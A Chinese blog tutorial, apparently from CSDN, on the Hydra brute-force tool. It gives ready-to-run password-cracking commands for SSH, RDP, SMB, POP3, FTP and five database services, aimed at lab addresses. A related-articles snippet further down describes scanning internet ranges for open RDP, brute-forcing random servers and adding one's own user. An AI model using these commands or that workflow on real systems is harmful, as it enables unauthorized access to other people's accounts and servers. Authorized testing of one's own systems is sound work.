应用协议安全:Hydra 端口爆破工具.(九头蛇)

最新推荐文章于 2024-05-11 02:44:23 发布
最新推荐文章于 2024-05-11 02:44:23 发布
阅读量798 收藏 17
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Karka_/article/details/136940434
版权

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web

登录、数据库、SSH、FTP 等服务.

目录:

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.

(1)实战:爆破 SSH 协议.( 22 端口 )

(2)实战:爆破 远程桌面 RDP.( 3389 端口 )

(3)实战:爆破 共享文件 SMB ( 445 端口 )

(4)实战:爆破 邮箱协议 POP3( 110 端口 )

(5)实战:爆破 文件传输 FTP ( 21 端口 )

(6)实战:爆破 MSSQL数据库( 1433 端口 )

(7)实战:爆破 MySQL数据库( 3306 端口 )

(8)实战:爆破 Oracle数据库( 1521 端口 )

(9)实战:爆破 Redis数据库( 6379 端口 )

(10)实战:爆破 PgSQL数据库( 5432 端口 )

免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
Hydra(九头蛇)使用的参数:

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-o 保存执行结果

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)

-vV 显示详细过程

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.
hydra

(1)实战:爆破 SSH 协议.( 22 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh

-L 指定用户名字典(文件)

-P 指定密码字典(文件)


ssh iwebsec@192.168.0.105            //登录 ssh (22端口)

ssh 账号@地址

(2)实战:爆破 远程桌面 RDP.( 3389 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程


rdesktop 192.168.0.106:3389        //登录远程桌面3389

rdesktop 地址:3389

(3)实战:爆破 共享文件 SMB ( 445 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 smb

-l 指定用户名

-P 指定密码字典(文件)

(4)实战:爆破 邮箱协议 POP3( 110 端口 )
hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(5)实战:爆破 文件传输 FTP ( 21 端口 )
hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(6)实战:爆破 MSSQL数据库( 1433 端口 )
hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV 

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程
(7)实战:爆破 MySQL数据库( 3306 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(8)实战:爆破 Oracle数据库( 1521 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(9)实战:爆破 Redis数据库( 6379 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV 
 
-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(10)实战:爆破 PgSQL数据库( 5432 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

程序员桔子
关注
  • 9
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
19-5 hydra爆破
weixin_43263566的博客
01-06 1052
Hydra 支持多种协议和服务,包括常见的 SSH、FTP、Telnet、HTTP、SMTP 等。可以通过命令行参数来配置 Hydra 的行为,例如指定要攻击的目标、设置并发连接数、定义用户名和密码列表等。它通常用于渗透测试和安全评估,以帮助发现系统中存在的安全漏洞,并加强对这些漏洞的防范。请注意,在使用Hydra进行安全测试时,必须遵守法律和道德规范,并且仅在授权的系统上进行测试。数据库通常会提供默认账户,如SQL Server的sa用户、MySQL的root用户、Oracle的System用户等。
九头安全测试工具Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议爆破
2024年最全Hydra密码爆破工具使用教程图文教程(超详细)(2),2024年最新34岁网络安全程序员裸辞
最新发布
2401_84297455的博客
05-11 861
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
hydra详解(仅供学习参考)
m0_50818626的博客
07-11 1280
Hydra是一款非常强大的暴力破解工具,由著名的黑客组织THC开发的一款开源暴力破解工具hydra 参数 IP 服务。2、 加载对应命令开始爆破。三、各类协议破解具体方法。
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头,是一款开源的暴力PJ工具,集成在kali当中。
Hydra九头工具使用(非常详细)从零基础入门到精通,看完这一篇就够了。
qq_44005305的博客
07-25 1411
hydra九头)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
hydra-toolbox:九头盒子的工具
02-12
hydra-toolbox:九头盒子的工具
hydra-antlia:九头的功能集合
05-22
用纯净的九头做几何图形的工作可能真的很乏味。 毕竟,Hydra的灵感来自于模拟模块化合成器。 在尝试在Hydra内绘制一些标记并意识到模拟信号的思维方式对于特定目标如此直观时,我开始了Antlia的工作。 我想多...
hydra-link-checker::snake:九头
05-07
要将输出保存到文件,请运行: python hydra.py [URL] > [PATH/TO/FILE.yaml] 您可以使用命令替换将当前日期添加到文件名,例如: python hydra.py [URL] > /path/to/ $( date ' +%Y_%m_%d ' ) _report.yaml 要了解...
超级弱口令检查工具V1.0 Beta28 20190715.zip
07-18
超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。 工具采用C#开发,需要安装.NET Framework 4.0,工具目前支持SSH、RDP、SMB、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、VNC、Redis等服务的弱口令检查工作。
DUBrute多密码爆破改进版.rar
07-24
其实爆破服务器很简单的,也是必学的。 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat-an命令可以查看该端口的开启。对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator或admin,而对于过于简单的密码,在3389密码字典中均可找到,下面来讲解爆破3389服务器,获得一台服务器的全过程。 工具:DUbrute爆破工具(或者用frdpb) SYN扫描工具 IP Search 首先用IPseacher搜索一段活跃的IP段,也可以在百度搜索活跃3389IP段,其次就是SYN扫描,最好是在server2003的系统下扫描,实在不行可以用VMware虚拟机做2003系统进行扫描,如果硬要在XP系统下扫描,那么先让XP支持SYN扫描,将支持SYN补丁tcpip复制到C盘的drives下,重启后即可进行SYN扫描,对于刚装好的server2003系统先开启以下服务。 scconfig LmHosts start= auto sc config RpcLocator start= auto sc configNtlmSsp start= auto sc config lanmanserver start= auto sc configSharedAccess start= disabled net start LmHosts 2>nul net startRpcLocator 2>nul net start NtlmSsp 2>nul net start lanmanserver2>nul net stop SharedAccess >nul 2>nul 将IPseach下的IP段复制到SYN扫描器下的ip.txt中,开始扫描一段时间。扫描完毕后生产ips文档,IPS文档中的IP就是开启3389端口的IP。 下面使用DUbrute工具,这款工具是全英文版的工具,下面本人对这款工具进行翻译下。 Source表示“源”。 Bad表示“坏的” Good表示“好的” Error表示“错误的” Check表示:“检测” Thread表示“线程” Start表示“开始” Stop表示“停止” Config表示“配置” Generation表示“生成” About表示“关于” Exit表示“退出” 大概重要的翻译完了,下面导入需要爆破的3389的IP,直接打开Generation,打开后会发现有三列需要添加的东西,第一列中是需要爆破的IP,我们直接点击FileIP导入IPS下的所有IP,第二列Login是登陆账号,我们这里可以直接选择AddLogin添加用户名,两个就可以了吧,就直接Administrator或者Admin,当然你也可以导入Username的字典,不过这样更慢而已。第三列Password,选择Filepass导入我们的3389密码字典。最后点击male,退出该界面。点击Config进行配置,对于2G的服务器可以将Thread线程到2000.我们随便选择1000或者500.。OK,下面有bad.txt和Good.txt里面装载的会是我们之后的服务器IP的正确账号密码和错误的连接IP。 OK,开始点击Start爆破,等待时间,Good后面出现数字表示我们已经爆破成功多少台服务器,Bad表示坏的正在Check中,我们可以在DUbrute下找到Good文档打开,可以看到爆破成功的服务器的IP和登录账号密码。 恭喜爆破成功,开始——运行——mstsc-admin,进入3389登录框,输入IP,连接上去输入爆破到的账号密码,登录服务器中,这一步恭喜你成功得到了一台服务器,赶紧创建一个属于自己的用户吧。亲,不要做坏事哦,如果是游戏服务器不要打扰别人游戏哦。 其实得到服务器后还有一系列留后门的方法,包括对net拒权的方法.
1433批量扫描超速版
09-16
1433批量扫描超1433批量扫描超速版速版
hydra暴力破解ftp-telnet-mysql-ssh-http
WEB渗透测试 从入门到萌新
10-09 6272
使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
【3389】俄远程桌面多端口爆破
weixin_30344131的博客
07-22 995
红尘汉化版 原版英文 烈焰下载提示: (原创)]俄国最新2013多端破神器(红尘网安独家汉化加优化!).zip 链接: http://pan.baidu.com/s/1mgzDrvy 【英文版】3389爆破神器-Fast RDP Brute GUI v2.0l 连接:http://pan.baidu.com/s/1nt7cMyX 转载于:https://www.cnblogs....
hydra 破解ssh 163邮箱
mixboot
01-12 9154
1.hydra 破解ssh 系统环境 # cat /etc/os-release AME="Kali GNU/Linux" ID=kali VERSION="2017.3" VERSION_ID="2017.3" ID_LIKE=debian 解压字典 # gunzip /usr/share/wordlists/rockyou.txt.gz nmap 扫描端口 扫描开放端口22 ssh软
hydra利用rdp协议破解密码
u011250160的博客
11-26 2652
靶机系统windows10 开启rdp服务:
爆破3389密码:目标主机Win2008(私有IP为192.168.1.167)开放3389端口,使用kali中的Hydra爆破密码。
彭淦淦的博客
04-25 4321
4.2 步骤 实现此案例需要按照如下步骤进行。 首先构造密码字典pass.txt,然后使用Hydra爆破密码。 1)运行命令 hydra -l administrator -P pass.txt 192.168.1.167 rdp 2)运行后的效果如图-9所示,破解的密码为Abc12345 图-9 ...
hydra爆破工具的缺点
04-22
Hydra爆破工具的缺点可能包括以下几点: 1. 并发请求限制:由于Hydra工具默认使用多线程发起请求,这就有可能导致在一些情况下,服务器会拒绝服务或者被防火墙屏蔽。 2. 特定协议支持不完善:虽然Hydra支持多种协议(如FTP,SSH,Telnet等),但它的支持在某些情况下可能并不完善,导致无法进行爆破或者出现其他问题。 3. 较为依赖字典:Hydra爆破成功率较大程度上取决于字典的质量和字典中包含的密码种类和数量,因此在字典的选择和使用上需要慎重。 4. 可能存在误报和漏报:在进行爆破过程中,由于网络传输、响应等环节存在不确定性,因此可能会存在一定概率的误报或漏报。 需要注意的是,Hydra作为一个开源的工具爆破行为可能违反法律法规,请合法使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值